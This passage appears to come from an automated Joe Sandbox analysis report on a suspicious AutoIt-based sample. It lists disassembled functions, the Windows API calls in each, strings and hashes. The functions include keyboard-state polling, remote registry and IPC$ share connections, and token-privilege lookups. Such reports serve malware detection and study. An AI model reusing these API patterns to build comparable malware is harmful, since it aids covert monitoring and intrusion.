                                                                            • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                            • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                            • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                            • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                            Function 00452E2A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 154COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 3038501623-2263619337
                                                                            • Opcode ID: 5f8c1c8e91388a45c2c83d9d903153b896fd08d16315a930f67df6de34675593
                                                                            • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                            • Opcode Fuzzy Hash: 5f8c1c8e91388a45c2c83d9d903153b896fd08d16315a930f67df6de34675593
                                                                            • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                            Function 0046FD7F Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 143windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                            • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                            • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                            • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                            • String ID: 2$X+
                                                                            • API String ID: 1331449709-2332518873
                                                                            • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                            • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                            • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                            • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                            Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • _memset.LIBCMT ref: 00458194
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                            • RegOpenKeyExW.ADVAPI32 ref: 00458219
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 2255324689-22481851
                                                                            • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                            • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                            • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                            • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                            Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32 ref: 00458513
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • RegOpenKeyExW.ADVAPI32 ref: 0045858A
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                            • __wcsicoll.LIBCMT ref: 004585D6
                                                                            • IIDFromString.OLE32(?,?), ref: 004585EB
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                            • String ID: ($interface$interface\
                                                                            • API String ID: 2231185022-3327702407
                                                                            • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                            • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                            • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                            • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                            Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                            • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                            • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                            • _wcscpy.LIBCMT ref: 004365F5
                                                                            • WSACleanup.WSOCK32 ref: 004365FD
                                                                            • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                            • _strcat.LIBCMT ref: 0043662F
                                                                            • _wcscpy.LIBCMT ref: 00436644
                                                                            • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                            • _wcscpy.LIBCMT ref: 00436666
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 2691793716-3771769585
                                                                            • Opcode ID: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                            • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                            • Opcode Fuzzy Hash: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                            • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                            Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                              • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                              • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B58
                                                                            • GetProcAddress.KERNEL32(00411739,DecodePointer,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B68
                                                                            • __lock.LIBCMT ref: 00416B8A
                                                                            • InterlockedIncrement.KERNEL32(00EA60FF,?,00411739,00417F28,00413979,?,?,00411739), ref: 00416B97
                                                                            • __lock.LIBCMT ref: 00416BAB
                                                                            • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                            • API String ID: 1028249917-2843748187
                                                                            • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                            • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                            • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                            • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                            Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColorBrush.USER32 ref: 00410326
                                                                            • RegisterClassExW.USER32 ref: 00410359
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                            • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                            • LoadIconW.USER32 ref: 004103B1
                                                                            • ImageList_ReplaceIcon.COMCTL32(00A5B930,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                            • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                            • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                            • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                            Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00453C0D
                                                                            • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                            • GetAsyncKeyState.USER32 ref: 00453C82
                                                                            • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                            • GetAsyncKeyState.USER32 ref: 00453CC9
                                                                            • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                            • GetAsyncKeyState.USER32 ref: 00453D07
                                                                            • GetKeyState.USER32(00000011), ref: 00453D15
                                                                            • GetAsyncKeyState.USER32 ref: 00453D3F
                                                                            • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                            • GetAsyncKeyState.USER32 ref: 00453D77
                                                                            • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                            • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                            • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                            • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                            Function 00437DB1 Relevance: 18.2, APIs: 12, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                            • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                            • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                            • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                            • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                            • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                            Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                            • String ID:
                                                                            • API String ID: 136442275-0
                                                                            • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                            • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                            • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                            • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                            Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_wcslen
                                                                            • String ID: HH
                                                                            • API String ID: 535477410-2761332787
                                                                            • Opcode ID: 494d45e37ad428fecd4b7fac967c7a4690a8e424be50daab94eb1a805ddb89e5
                                                                            • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                            • Opcode Fuzzy Hash: 494d45e37ad428fecd4b7fac967c7a4690a8e424be50daab94eb1a805ddb89e5
                                                                            • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                            Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                            • _wcslen.LIBCMT ref: 00460502
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                            • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                            • String ID: ThumbnailClass
                                                                            • API String ID: 4123061591-1241985126
                                                                            • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                            • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                            • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                            • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                            Function 00450E7D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyWindow
                                                                            • String ID: static
                                                                            • API String ID: 3375834691-2160076837
                                                                            • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                            • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                            • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                            • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                            Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                            • _memcmp.LIBCMT ref: 004394A9
                                                                            • CloseHandle.KERNEL32(?), ref: 004394F8
